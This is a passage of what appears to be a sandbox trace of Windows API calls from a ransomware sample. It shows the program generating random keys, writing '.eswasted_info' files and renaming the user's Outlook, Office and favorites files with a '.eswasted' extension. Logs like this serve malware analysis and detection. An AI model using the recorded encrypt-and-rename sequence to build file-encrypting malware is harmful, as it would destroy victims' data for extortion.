HALPmcxz\\Documents\\NHqD6Bz\\_DFAUOuqJr3pbSoWNE3.csv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhqd6bz\\_dfauouqjr3pbsowne3.csv.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0076.856] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0076.858] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f0e0) returned 1 [0076.859] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0x1b8, pbBuffer=0x7112a8 | out: pbBuffer=0x7112a8) returned 1 [0076.859] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0076.859] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f0e0) returned 1 [0076.860] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0076.860] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0076.870] SetEndOfFile (hFile=0x108) returned 1 [0076.872] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71a288 | out: hHeap=0x6d0000) returned 1 [0076.872] CloseHandle (hObject=0x108) returned 1 [0076.874] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0076.874] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f0e0) returned 1 [0076.875] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0076.875] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0076.875] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst") returned 80 [0076.875] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2aa) returned 0x6f65b8 [0076.875] lstrcpyW (in: lpString1=0x6f6658, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0076.875] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x71a288 [0076.875] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f0e0) returned 1 [0076.876] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0xa46, pbBuffer=0x71a288 | out: pbBuffer=0x71a288) returned 1 [0076.876] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0076.876] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0076.876] WriteFile (in: hFile=0x108, lpBuffer=0x71a288*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x71a288*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0076.878] SetEndOfFile (hFile=0x108) returned 1 [0076.878] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.878] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71a288 | out: hHeap=0x6d0000) returned 1 [0076.878] lstrcpyW (in: lpString1=0x6f6658, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0076.878] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst.eswasted")) returned 1 [0076.879] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0076.879] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0077.139] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0077.140] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0077.140] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.140] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0077.140] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0077.141] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.149] SetEndOfFile (hFile=0x108) returned 1 [0077.152] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71a288 | out: hHeap=0x6d0000) returned 1 [0077.152] CloseHandle (hObject=0x108) returned 1 [0077.155] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f65b8 | out: hHeap=0x6d0000) returned 1 [0077.155] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0077.156] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0077.156] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.156] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zzt3BTBWxJ96uk2VP a7.pptx") returned 69 [0077.156] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x294) returned 0x71ec18 [0077.156] lstrcpyW (in: lpString1=0x71eca2, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0077.156] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x71a288 [0077.157] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0077.157] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x71a288 | out: pbBuffer=0x71a288) returned 1 [0077.157] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.157] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zzt3BTBWxJ96uk2VP a7.pptx.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zzt3btbwxj96uk2vp a7.pptx.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0077.164] WriteFile (in: hFile=0x108, lpBuffer=0x71a288*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x71a288*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0077.165] SetEndOfFile (hFile=0x108) returned 1 [0077.165] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.165] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71a288 | out: hHeap=0x6d0000) returned 1 [0077.165] lstrcpyW (in: lpString1=0x71eca2, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0077.165] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zzt3BTBWxJ96uk2VP a7.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zzt3btbwxj96uk2vp a7.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zzt3BTBWxJ96uk2VP a7.pptx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zzt3btbwxj96uk2vp a7.pptx.eswasted")) returned 1 [0077.166] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zzt3BTBWxJ96uk2VP a7.pptx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zzt3btbwxj96uk2vp a7.pptx.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0077.166] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0077.168] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0077.169] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0077.169] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.169] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0077.170] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0077.170] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.178] SetEndOfFile (hFile=0x108) returned 1 [0077.180] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71a288 | out: hHeap=0x6d0000) returned 1 [0077.180] CloseHandle (hObject=0x108) returned 1 [0077.183] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0077.183] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0077.184] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0077.184] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.184] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\z_sQYNc7IQLc1-d.docx") returned 64 [0077.184] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x28a) returned 0x71ec18 [0077.184] lstrcpyW (in: lpString1=0x71ec98, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0077.184] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x71a288 [0077.184] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0077.185] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x71a288 | out: pbBuffer=0x71a288) returned 1 [0077.185] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.185] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\z_sQYNc7IQLc1-d.docx.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\z_sqync7iqlc1-d.docx.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0077.186] WriteFile (in: hFile=0x108, lpBuffer=0x71a288*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x71a288*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0077.187] SetEndOfFile (hFile=0x108) returned 1 [0077.187] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.187] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71a288 | out: hHeap=0x6d0000) returned 1 [0077.187] lstrcpyW (in: lpString1=0x71ec98, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0077.187] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\z_sQYNc7IQLc1-d.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\z_sqync7iqlc1-d.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\z_sQYNc7IQLc1-d.docx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\z_sqync7iqlc1-d.docx.eswasted")) returned 1 [0077.188] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\z_sQYNc7IQLc1-d.docx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\z_sqync7iqlc1-d.docx.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0077.188] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0077.190] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0077.190] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0077.190] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.190] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0077.191] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0077.191] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.200] SetEndOfFile (hFile=0x108) returned 1 [0077.202] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71a288 | out: hHeap=0x6d0000) returned 1 [0077.202] CloseHandle (hObject=0x108) returned 1 [0077.203] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0077.204] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0077.204] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0077.204] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.204] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url") returned 69 [0077.204] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x294) returned 0x71ec18 [0077.205] lstrcpyW (in: lpString1=0x71eca2, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0077.205] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x71a288 [0077.205] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0077.205] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x71a288 | out: pbBuffer=0x71a288) returned 1 [0077.205] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.205] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0077.285] WriteFile (in: hFile=0x124, lpBuffer=0x71a288*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x71a288*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0077.287] SetEndOfFile (hFile=0x124) returned 1 [0077.287] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.287] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71a288 | out: hHeap=0x6d0000) returned 1 [0077.287] lstrcpyW (in: lpString1=0x71eca2, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0077.287] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url.eswasted")) returned 1 [0077.444] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0077.444] CreateFileMappingW (hFile=0x130, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0077.445] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0077.445] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0077.445] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.446] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0077.446] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0077.447] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.457] SetEndOfFile (hFile=0x124) returned 1 [0077.459] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71a288 | out: hHeap=0x6d0000) returned 1 [0077.459] CloseHandle (hObject=0x124) returned 1 [0077.461] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0077.461] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0077.462] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0077.462] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.462] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned 84 [0077.462] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2b2) returned 0x6f65b8 [0077.462] lstrcpyW (in: lpString1=0x6f6660, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0077.462] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x71a288 [0077.462] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0077.463] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x71a288 | out: pbBuffer=0x71a288) returned 1 [0077.463] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.463] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0077.463] WriteFile (in: hFile=0x124, lpBuffer=0x71a288*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x71a288*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0077.464] SetEndOfFile (hFile=0x124) returned 1 [0077.464] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.465] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71a288 | out: hHeap=0x6d0000) returned 1 [0077.465] lstrcpyW (in: lpString1=0x6f6660, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0077.465] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url.eswasted")) returned 1 [0077.465] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0077.465] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x130 [0077.466] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0077.467] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0077.467] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.467] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0077.467] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0077.467] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.620] SetEndOfFile (hFile=0x124) returned 1 [0077.622] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0077.622] CloseHandle (hObject=0x124) returned 1 [0077.624] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f65b8 | out: hHeap=0x6d0000) returned 1 [0077.624] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0077.625] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0077.625] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.625] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url") returned 70 [0077.625] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x296) returned 0x6f5cc0 [0077.625] lstrcpyW (in: lpString1=0x6f5d4c, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0077.625] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x722428 [0077.625] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0077.626] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x722428 | out: pbBuffer=0x722428) returned 1 [0077.626] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.626] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0077.627] WriteFile (in: hFile=0x124, lpBuffer=0x722428*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x722428*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0077.628] SetEndOfFile (hFile=0x124) returned 1 [0077.628] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.628] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0077.628] lstrcpyW (in: 